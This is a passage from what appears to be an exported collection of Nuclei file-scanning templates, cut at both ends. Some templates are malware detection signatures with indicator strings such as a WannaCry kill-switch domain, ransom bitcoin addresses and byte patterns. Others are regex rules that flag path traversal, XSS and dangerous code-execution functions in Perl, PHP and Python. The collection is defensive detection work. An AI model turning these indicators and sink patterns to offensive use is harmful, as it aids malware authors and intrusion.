490a00463044022061bcb47a0873b0588f265a7e601cd05b6bb37ad8e063e592fdd7d903ad4cc0be02202d8867290f2fdd9ab8efecfb3d5fedc3cadfc2dafc41e8a2adef2fbb43b83e1d:922c64590222798bb761d5b6d8e72950\n", "hash": "8c0f47dc477f82cef374e86c868efc6d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ddf" }, "name": "wabot-malware.yaml", "content": "id: wabot-malware\n\ninfo:\n name: Warp Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Wabot.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - \"433A5C6D6172696A75616E612E747874\"\n - \"7349524334\"\n condition: and\n\n# digest: 490a00463044022059b384672714a4093b8f5cfd73c51f240d9ec565c0df7fedd17166c7d2168368022061a1fd229442ae14c76593442382c14c59b2c8a5e27f91ca120691ed31497237:922c64590222798bb761d5b6d8e72950\n", "hash": "fe82881adb138982fae5d92ddb0593aa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de0" }, "name": "wannacry-malware.yaml", "content": "id: wannacry-malware\n\ninfo:\n name: WannaCry Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_wannacry.yara\n tags: malware,file,wannacry\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"msg/m_chinese\"\n - \".wnry\"\n - \"attrib +h\"\n condition: and\n\n - type: word\n part: raw\n words:\n - \"WNcry@2ol7\"\n - \"iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com\"\n - \"115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn\"\n - \"12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw\"\n - \"13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94\"\n condition: or\n\n# digest: 490a00463044022075f35e75c9f2832f30654ca6b3c0a8ba30466e117d4c4b8f42baa4b0a9ae5a3202203804e16360e6ec92468528804f0e3e34058c9df44c1c1ecc8269b7cfcc84dbc2:922c64590222798bb761d5b6d8e72950\n", "hash": "e6149b685c60c0ad21c5a6a4b283bc6d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de1" }, "name": "warp-malware.yaml", "content": "id: warp-malware\n\ninfo:\n name: Warp Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Warp.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/2011/n325423.shtml?\"\n - \"wyle\"\n - \"\\\\~ISUN32.EXE\"\n condition: or\n\n - type: binary\n binary:\n - \"80382B7503C6002D80382F7503C6005F\"\n\n# digest: 4a0a00473045022100841926e56850756403c4d4035ecc9b7d08e8e0642b013dea6df56a912a82b6c402202ee68a5dcea7ca1703fe713ad85fe77313fc855e95a50ff72976487416ef564c:922c64590222798bb761d5b6d8e72950\n", "hash": "23afac55b88bdf1f0d7fc6178c8e86f0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de2" }, "name": "xhide-malware.yaml", "content": "id: xhide-malware\n\ninfo:\n name: xHide Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XHide.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - 'XHide - Process Faker'\n - 'Fakename: %s PidNum: %d'\n condition: and\n\n# digest: 4a0a00473045022100de21a884f48a0719bc4f2ee4ef7743dd573ac95eff672f1593fd0645dbd63cb5022027b0a93e2dcd4d005fbd53e222c2377c7aebf23269112986ecf201251c520856:922c64590222798bb761d5b6d8e72950\n", "hash": "5a4701becf9909230069e8708cf9ee2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de3" }, "name": "xor-ddos-malware.yaml", "content": "id: xor-ddos-malware\n\ninfo:\n name: XOR_DDosv1 Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_XOR_DDos.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"BB2FA36AAA9541F0\"\n - \"md5=\"\n - \"denyip=\"\n - \"filename=\"\n - \"rmfile=\"\n - \"exec_packet\"\n - \"build_iphdr\"\n condition: and\n\n# digest: 4b0a004830460221008074e35a2ef70400e3e76588c3d1bf60786f1ce420219e884ccffcdc389b1f5e022100fc59177fbc3a832292f57bc0083333fd895d7523e7b40223b169411d1f256f7a:922c64590222798bb761d5b6d8e72950\n", "hash": "53920373af7a6848ec11a6ce47ebc20f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de4" }, "name": "yayih-malware.yaml", "content": "id: yayih-malware\n\ninfo:\n name: Yayih Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Yayih.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"/bbs/info.asp\"\n - \"\\\\msinfo.exe\"\n - \"%s\\\\%srcs.pdf\"\n - \"\\\\aumLib.ini\"\n condition: or\n\n - type: binary\n binary:\n - \"8004087A03C18B45FC8034081903C1413B0A7CE9\"\n\n# digest: 4a0a00473045022100f21491da53356e83942c2502eae399b18e503026b04fd6a04d7e3d666c6253f802207d7efabac7623bd14bff67a913e9bbf35fc19504e5bda37c3a3e350c719ead77:922c64590222798bb761d5b6d8e72950\n", "hash": "e9b6a172b045e64ad3f8df57ba2ce95f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de5" }, "name": "zeghost-malware.yaml", "content": "id: zeghost-malware\n\ninfo:\n name: Zegost Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Zegost.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: binary\n binary:\n - '392F6633304C693575624F35444E414444784738733736327471593D'\n - '00BADA2251426F6D6500'\n condition: and\n\n# digest: 4a0a00473045022037003aa20e994bc79289f19bc0e22ad52153ad14777b74ad17e88141d20454d10221008e9f88d8819669098597631e9d0a9745c5330e9b8a255b6036a0e8d653c6fcd9:922c64590222798bb761d5b6d8e72950\n", "hash": "3821a122f6e055bd732df5d527f5cefa", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de6" }, "name": "zoxpng-malware.yaml", "content": "id: zoxpng-malware\n\ninfo:\n name: ZoxPNG Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_ZoxPNG.yar\n tags: malware,file\nfile:\n - extensions:\n - all\n matchers:\n - type: word\n part: raw\n words:\n - \"png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58\"\n\n# digest: 4b0a00483046022100c9c4e20dcdb3d7419d7e4531d93ebd22b25c13131c670da3f6e4ad98db8457a2022100c52254e4826289e996691e927c8afc58a2421da3603b993852f3ee2205b2c7c8:922c64590222798bb761d5b6d8e72950\n", "hash": "6c14e35d6cb56347c7736167f1b798c2", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de7" }, "name": "zrypt-malware.yaml", "content": "id: zrypt-malware\n\ninfo:\n name: Zcrypt Malware - Detect\n author: daffainfo\n severity: info\n reference: https://github.com/airbnb/binaryalert/blob/master/rules/public/ransomware/windows/ransomware_windows_zcrypt.yara\n tags: malware,file,zrypt\nfile:\n - extensions:\n - all\n\n matchers-condition: or\n matchers:\n - type: word\n part: raw\n words:\n - \"How to Buy Bitcoins\"\n - \"ALL YOUR PERSONAL FILES ARE ENCRYPTED\"\n - \"Click Here to Show Bitcoin Address\"\n - \"MyEncrypter2.pdb\"\n condition: or\n\n - type: word\n part: raw\n words:\n - \".p7b\"\n - \".p7c\"\n - \".pdd\"\n - \".pef\"\n - \".pem\"\n - \"How to decrypt files.html\"\n condition: and\n\n# digest: 490a004630440220505b7b0359dfc00b9f7d9f9a654fa51b862140381c8785ca1f1d04cd4ba7f1f00220194afc36d15fcaef2fc487ce83de91edf5ff902675b4c0f06f016c8c7574e74c:922c64590222798bb761d5b6d8e72950\n", "hash": "605b957a61c347a228a6ac2151916003", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de8" }, "name": "admzip-path-overwrite.yaml", "content": "id: admzip-path-overwrite\n\ninfo:\n name: Admzip Path Overwrite\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure ZIP archive extraction using adm-zip can result in arbitrary path over write and can result in code injection.\n tags: file,nodejs,admzip\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\\\\\('adm-zip'\\\\\\\\)\"\n - \"\\\\.forEach\\\\(function .*\\\\(.*, \\\\.\\\\*\\\\) \\\\{\"\n - \"\\\\.createWriteStream\\\\(.*\\\\) \\\\}, \\\\.\\\\*\\\\)\"\n - \"\\\\.writeFile\\\\(.*\\\\)\"\n - \"\\\\.writeFileSync\\\\(.*\\\\) \\\\}, \\\\.\\\\*\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100d3f3fb61dfc42f08f4a89b791f5374e788d8d917e8c701876ebdf5f946e9a559022100a68b85ca82e5fc59479c77c56d1c3abdda513d5863ada63ba5b37d0b5ad5ae94:922c64590222798bb761d5b6d8e72950\n", "hash": "0c34ef9623485c01b75133aad2a9bd2c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307de9" }, "name": "express-lfr.yaml", "content": "id: express-lfr\n\ninfo:\n name: Express - Local File Read\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input in express render() function can result in arbitrary file read if hbs templating is used.\n tags: file,nodejs,express,lfr\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+?\\\\.\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n - \"(\\\\$[\\\\w\\\\W]+?)\\\\.render\\\\(\\\\$[\\\\w\\\\W]+?, <[\\\\w\\\\W]+? \\\\\\\\$[\\\\w\\\\W]+? [\\\\w\\\\W]+? >\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100e7798827d9cc0ed3a27739501621560cd2752e52aba95d220252540f0361afeb022100a8c14ce89e7beca1fb0c19891d37761ed32e3c096e6033a2c2d4a1b77f1a49f6:922c64590222798bb761d5b6d8e72950\n", "hash": "098cc5c043fe8dccb3584bae9b934887", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dea" }, "name": "generic-path-traversal.yaml", "content": "id: generic-path-traversal\n\ninfo:\n name: Generic - Path Traversal\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input in readFile()/readFileSync() can endup in Directory Traversal Attacks.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"[^\\\\.]*\\\\.createReadStream\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - \"[^\\\\.]*\\\\.readFile\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - \"[^\\\\.]*\\\\.readFileSync\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n - \"[^\\\\.]*\\\\.readFileAsync\\\\([^\\\\)]*\\\\, <[\\\\s\\\\S]*?\\\\> [^\\\\)]*\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100e21a018d792fd5746301590fee7667c09666ad26347732653bdf90db09245f150221008bddd8b9b51c116885885104f24ed7cda9f5ba500680a85415390a22c4584a8b:922c64590222798bb761d5b6d8e72950\n", "hash": "7c6e3ba2d062402e5213da0f83b57867", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307deb" }, "name": "tar-path-overwrite.yaml", "content": "id: tar-extraction\n\ninfo:\n name: Path Injection Vulnerability in TAR Extraction\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure TAR archive extraction can result in arbitrary path over write and can result in code injection.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\('tar-stream'\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\, [\\\\w\\\\W]*?\\\\)\"\n condition: or\n\n# digest: 490a0046304402207e72208a1944e7df2a904fe5c6f0286522d073ca069018194bf4e461a96c7f030220657b4086fb9b504fdfd3ee97fe79018b05f66382b367ba76d019e1d3e0a61c82:922c64590222798bb761d5b6d8e72950\n", "hash": "0c7518f5b2b95e1f1cd022c53c1d8088", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dec" }, "name": "xss-disable-mustache-escape.yaml", "content": "id: xss-disable-mustache-escape\n\ninfo:\n name: XSS Disable Mustache Escape\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Markup escaping disabled. This can be used with some template engines to escape disabling of HTML entities, which can lead to XSS attacks.\n tags: file,nodejs,mustache,xss\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"[\\\\w\\\\W]+?\\\\.escapeMarkup = false\"\n\n# digest: 4a0a00473045022041c26d15e30a67da51faf8296e3dcfa26d1debb48e546df53fd49950ac2755bc022100ba0c25be763311d27fd4b84f86a184a622246c44589a783faac58165f161b5c9:922c64590222798bb761d5b6d8e72950\n", "hash": "2e828e4f3e3af09082ed23dde6566288", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307ded" }, "name": "xss-serialize-javascript.yaml", "content": "id: xss-serialize-javascript\n\ninfo:\n name: XSS Serialize Javascript\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Untrusted user input reaching `serialize-javascript` with `unsafe` attribute can cause Cross Site Scripting (XSS).\n tags: file,nodejs,serialize,xss\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\('serialize-javascript'\\\\)\"\n - \"\\\\$S\\\\(\\\\.\\\\*?, \\\\{unsafe: true\\\\}\\\\)\"\n condition: or\n\n - type: regex\n negative: true\n regex:\n - \"escape\\\\(.*?\\\\)\"\n - \"encodeURI\\\\(.*?\\\\)\"\n condition: or\n\n# digest: 4b0a00483046022100c969127d5164e847745c08918d013ec03653d1ebd3df975a2ebba346eabc86ca022100eb6452e18b4c019fede7e45505c43395c0a854ec7842beb502dfed933b126877:922c64590222798bb761d5b6d8e72950\n", "hash": "39067abfb578d38dd60f7f1fd2d83861", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307dee" }, "name": "zip-path-overwrite.yaml", "content": "id: zip-path-overwrite\n\ninfo:\n name: Zip Path Overwrite\n author: me_dheeraj (https://twitter.com/Dheerajmadhukar)\n severity: info\n description: Insecure ZIP archive extraction can result in arbitrary path overwrite and can result in code injection.\n tags: file,nodejs\nfile:\n - extensions:\n - all\n matchers:\n - type: regex\n regex:\n - \"require\\\\('unzip'\\\\)\"\n - \"require\\\\('unzipper'\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.Parse\\\\([\\\\w\\\\W]*?\\\\)\\\\)\\\\.on\\\\('entry', function [\\\\w\\\\W]*?\\\\([\\\\w\\\\W]*?\\\\) \\\\{\"\n - \"[\\\\w\\\\W]+? = [\\\\w\\\\W]+?\\\\.indexOf\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.pipe\\\\([\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\)\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.Parse\\\\([\\\\w\\\\W]*?\\\\)\\\\.on\\\\('entry', function [\\\\w\\\\W]*?\\\\([\\\\w\\\\W]*?\\\\) \\\\{\"\n - \"[\\\\w\\\\W]+?\\\\.createWriteStream\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFile\\\\([\\\\w\\\\W]*?\\\\)\"\n - \"[\\\\w\\\\W]+?\\\\.writeFileSync\\\\([\\\\w\\\\W]*?\\\\)\"\n condition: or\n\n# digest: 4a0a00473045022047f3632b4b629a718f03f122923ecb7a440173d05eff63495de945c7eecaa959022100c898c664cdbf7a53469f2d4f41fb76df1580af59737082875247e0e42a4d70c8:922c64590222798bb761d5b6d8e72950\n", "hash": "d1348c696b70784068138833488eec9b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307def" }, "name": "perl-scanner.yaml", "content": "id: perl-scanner\n\ninfo:\n name: Perl File Scanner\n author: geeknik\n severity: info\n tags: perl,file\nfile:\n - extensions:\n - pl # default\n - perl # uncommon\n - pod # plain old documentation\n - pm # perl module\n - cgi # common gateway interface\n\n extractors:\n - type: regex\n # Standard random number generators should not be used to generate randomness used for security reasons. For security sensitive randomness a crytographic randomness generator that provides sufficient entropy should be used.\n regex:\n - 'srand'\n - 'rand'\n\n - type: regex\n regex:\n - 'getc'\n - 'readdir'\n - 'read'\n - 'sysread'\n\n - type: regex\n # When using exec, it is important to be sure that the string being used does not contain relative paths elements (../ for example), or a null, which may cause underlying C calls to behave strangely.\n regex:\n - 'exec'\n\n - type: regex\n # The filehandle argument should not be derived from user input. Doing so could allow arbitrary filehandles to have operations carried out on them.\n regex:\n - 'fcntl'\n\n - type: regex\n # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice.\n regex:\n - 'bind'\n\n - type: regex\n # When using setpgrp, neither argument should be derived from user input, doing so may allow the attacker to modify both the PID and the PGRP argument, possibly allowing arbitrary processes to have their process group changed.\n regex:\n - 'setpgrp'\n\n - type: regex\n # When using setpriority, do not pass arguments to it that are derived from user input. Doing so could allow an attacker to set the priority of an arbitrary process on the system.\n regex:\n - 'setpriority'\n\n - type: regex\n # Care should be exercised when using the syscall function. Arguments derived from user input are to be avoided, and are especially dangerous due to the fact they are passed directly to the underlying OS call. There is also a potential for buffer-overflow like problems with strings that may be written to. Extend all perl strings to sane lengths before passing them into this function.\n regex:\n - 'syscall'\n\n - type: regex\n # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data.\n regex:\n - 'connect'\n\n - type: regex\n # When using system, it is important to be sure that the string being used does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave strangely. It is also imperative to insure the string has no characters that may be interpreted by the shell, possibly allowing arbitrary commands to be run.\n regex:\n - 'system'\n\n - type: regex\n # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a component of it. Strings should be checked for occurrences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a \"|\", as this will cause the path to be executed.\n regex:\n - 'open'\n\n - type: regex\n # When using this function, it is important to be sure that the string being passed in does not contain relative path elements (../ for example), or a null, which may cause underlying C calls to behave in ways you do not expect. This is especially important if the string is in any way constructed from a user supplied value.\n regex:\n - 'mkdir'\n - 'chdir'\n - 'rmdir'\n - 'chown'\n - 'chmod'\n - 'link'\n - 'symlink'\n - 'truncate'\n - 'chroot'\n\n - type: regex\n # Using a user supplied expression as an argument to this function should be avoided. Explicitly set the umask to a value you know is safe.\n regex:\n - 'umask'\n\n - type: regex\n # Avoid constructing the list of process ids to kill with any strings that contain user inputted data. Users may be able to manipulate the pid values in such a way as to cause arbitrary signals to be sent to processes, possibly leading to exploits or DoS attacks.\n regex:\n - 'kill'\n\n - type: regex\n # Using user supplied strings as the arguments to ioctl may allow the user to manipulate the device in arbitrary ways.\n regex:\n - 'ioctl'\n\n - type: regex\n # Using user supplied strings anywhere inside of an eval is extremely dangerous. Unvalidated user input fed into an eval call may allow the user to execute arbitrary perl code. Avoid ever passing user supplied strings into eval.\n regex:\n - 'eval'\n\n - type: regex\n # Glob invokes a shell (usually /bin/csh) to obtain the list of filenames that match the glob pattern. Unvalidated user input used in a glob pattern could allow arbitrary shell code to be run, possibly executing programs as a result. Avoid using user input in glob patterns.\n regex:\n - 'glob'\n\n - type: regex\n # Remember that sensitive data get copied on fork. For example, a random number generator's internal state will get duplicated, and the child may start outputting identical number streams.\n regex:\n - 'fork'\n\n - type: regex\n # DNS results can easily be forged by an attacker (or arbitrarily set to large values, etc), and should not be trusted.\n regex:\n - 'gethostbyname'\n - 'gethostbyaddr'\n\n# digest: 4a0a00473045022100fbd7b50a240a33711df2a0f790ba06a15bcf1aa8a14085015a5b5e53c03df7cd02206d81256adc29f4c4ec6338882c5287986ffa812170c16361dc96163e2df71b29:922c64590222798bb761d5b6d8e72950\n", "hash": "786923fa146a30f4814631b319140ae8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df0" }, "name": "php-scanner.yaml", "content": "id: php-scanner\n\ninfo:\n name: PHP Scanner\n author: geeknik\n severity: info\n tags: php,file\nfile:\n - extensions:\n - html\n - htm\n - phtml\n - php\n - php3\n - php4\n - php5\n - phps\n - cgi\n - inc\n - tpl\n - test\n - module\n - plugin\n\n extractors:\n - type: regex\n # Investigate for possible SQL Injection\n # Likely vulnerable: $dbConn->GetRow(\"SELECT * FROM users WHERE id = $user_id\");\n # Likely not Vulnerable: $dbConn->GetRow(\"SELECT * FROM users WHERE id = ?\", array('$user_id'));\n regex:\n - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'\n\n - type: regex\n # Warn when var_dump is found\n regex:\n - 'var_dump'\n\n - type: regex\n # Warn when display_errors is enabled manually\n regex:\n - 'display_errors'\n\n - type: regex\n # Avoid the use of eval()\n regex:\n - 'eval'\n - 'eval\\((base64|eval|\\$_|\\$\\$|\\$[A-Za-z_0-9\\{]*(\\(|\\{|\\[))'\n\n - type: regex\n # Avoid the use of exit or die()\n regex:\n - 'exit'\n - 'die'\n\n - type: regex\n # Avoid the use of logical operators (ex. using and over &&)\n regex:\n - 'and'\n\n - type: regex\n # Avoid the use of the ereg* functions (now deprecated)\n regex:\n - 'ereg'\n\n - type: regex\n # Ensure that the second parameter of extract is set to not overwrite (not EXTR_OVERWRITE)\n regex:\n - 'extract'\n\n - type: regex\n # Checking output methods (echo, print, printf, print_r, vprintf, sprintf) that use variables in their options\n regex:\n - 'echo'\n - 'print'\n - 'printf'\n - 'print_r'\n - 'vprintf'\n - 'sprintf'\n\n - type: regex\n # Ensuring you're not using echo with file_get_contents\n regex:\n - 'file_get_contents'\n\n - type: regex\n # Testing for the system execution functions and shell exec (backticks)\n regex:\n - '\\\\`'\n\n - type: regex\n # Use of readfile, readlink and readgzfile\n regex:\n - 'readfile'\n - 'readlink'\n - 'readgzfile'\n\n - type: regex\n # Using parse_str or mb_parse_str (writes values to the local scope)\n regex:\n - 'parse_st'\n - 'mb_parse_str'\n\n - type: regex\n # Using session_regenerate_id either without a parameter or using false\n regex:\n - 'session_regenerate'\n\n - type: regex\n # Avoid use of $_REQUEST (know where your data is coming from)\n regex:\n - '\\\\$_REQUEST'\n\n - type: regex\n # Don't use mysql_real_escape_string\n regex:\n - 'mysql_real_escape_string'\n\n - type: regex\n # Avoiding use of import_request_variables\n regex:\n - 'import_request_variables'\n\n - type: regex\n # Avoid use of GLOBALS\n regex:\n - 'GLOBALS'\n\n - type: regex\n regex:\n - '_GET'\n\n - type: regex\n regex:\n - '_POST'\n\n - type: regex\n regex:\n - '_COOKIE'\n\n - type: regex\n regex:\n - '_SESSION'\n\n - type: regex\n # Ensure the use of type checking validating against booleans (===)\n regex:\n - '\\\\=\\\\=\\\\='\n\n - type: regex\n # Ensure that the /e modifier isn't used in regular expressions (execute)\n regex:\n - '\\\\/e'\n\n - type: regex\n # Using concatenation in header() calls\n regex:\n - 'header'\n\n - type: regex\n # Avoiding the use of $http_raw_post_data\n regex:\n - '\\\\$http_raw_post_data'\n\n - type: regex\n # interesting functions for POP/Unserialize\n regex:\n - \"__autoload\"\n - \"__destruct\"\n - \"__wakeup\"\n - \"__toString\"\n - \"__call\"\n - \"__callStatic\"\n - \"__get\"\n - \"__set\"\n - \"__isset\"\n - \"__unset\"\n\n - type: regex\n # phpinfo detected\n regex:\n - \"phpinfo\"\n\n - type: regex\n # registerPHPFunctions() allows code exec in XML\n regex:\n - \"registerPHPFunctions\"\n\n - type: regex\n regex:\n - \"session_start\"\n\n - type: regex\n # dBase DBMS\n regex:\n - \"dbase_open\"\n\n - type: regex\n # DB++ DBMS\n regex:\n - \"dbplus_open\"\n - \"dbplus_ropen\"\n\n - type: regex\n # Frontbase DBMS\n regex:\n - \"fbsql_connect\"\n\n - type: regex\n # Informix DBMS\n regex:\n - \"ifx_connect\"\n\n - type: regex\n # IBM DB2 DBMS\n regex:\n - \"db2_(p?)connect\"\n\n - type: regex\n # FTP server\n regex:\n - \"ftp_(ssl_)?connect\"\n\n - type: regex\n # Ingres DBMS\n regex:\n - \"ingres_(p?)connect\"\n\n - type: regex\n # LDAP server\n regex:\n - \"ldap_connect\"\n\n - type: regex\n # msession server\n regex:\n - \"msession_connect\"\n\n - type: regex\n # mSQL DBMS\n regex:\n - \"msql_(p?)connect\"\n\n - type: regex\n # MsSQL DBMS\n regex:\n - \"mssql_(p?)connect\"\n\n - type: regex\n # MySQL DBMS\n regex:\n - \"mysql_(p?)connect\"\n\n - type: regex\n # MySQLi Extension\n regex:\n - \"mysqli((_real)?_connect)?|_query\"\n\n - type: regex\n # Oracle OCI8 DBMS\n regex:\n - \"oci|(_new?)|_connect|(n?|p?)logon\"\n\n - type: regex\n # Oracle DBMS\n regex:\n - \"ora_(p?)connect\"\n\n - type: regex\n # Ovrimos SQL DBMS\n regex:\n - \"ovrimos_connect\"\n\n - type: regex\n # PostgreSQL DBMS\n regex:\n - \"pg_(p?)connect\"\n\n - type: regex\n # SQLite DBMS\n regex:\n - \"sqlite_(p?)open\"\n\n - type: regex\n # SQLite3 DBMS\n regex:\n - \"SQLite3\"\n\n - type: regex\n # Sybase DBMS\n regex:\n - \"sybase_(p?)connect\"\n\n - type: regex\n # TokyoTyrant DBMS\n regex:\n - \"TokyoTyrant\"\n\n - type: regex\n # XML document\n regex:\n - \"x(ptr|path)_new_context\"\n\n - type: regex\n # Investigate if GetTableFields is called safely\n regex:\n - \"GetTableFields\"\n\n - type: regex\n regex:\n - \"ini_get.*magic_quotes_gpc.*\"\n\n# digest: 4a0a00473045022100cdc04b80c9479b1a4fe8a4dd836ca51e473d21b6dfee8a10d4766eab8980dd66022002ed5ea70b600f04f8842ba1b24b70122656832d5769131b53c765c8f678a62a:922c64590222798bb761d5b6d8e72950\n", "hash": "24cd608e2a8d65f8ccda794bce38fccb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307df1" }, "name": "python-scanner.yaml", "content": "id: python-scanner\n\ninfo:\n name: Python Scanner\n author: majidmc2\n severity: info\n description: Indicators for dangerous Python functions\n reference:\n - https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html\n - https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html\n tags: python,file,sast\nfile:\n - extensions:\n - py\n\n extractors:\n - type: regex\n name: code-injection\n regex:\n - 'exec'\n - 'eval'\n - '__import__'\n - 'execfile'\n\n - type: regex\n name: command-injection\n regex:\n - 'subprocess.call\\(.*shell=True.*\\)'\n - 'os.system'\n - 'os.popen\\d?'\n - 'subprocess.run'\n - 'commands.getoutput'\n\n - type: regex\n name: untrusted-source\n regex:\n - 'pickle\\.loads'\n - 'c?Pickle\\.loads?'\n - 'marshal\\.loads'\n - 'pickle\\.Unpickler'\n\n - type: regex\n name: dangerous-yaml\n regex:\n - 'yaml\\.load'\n - 'yaml\\.safe_load'\n\n - type: regex\n 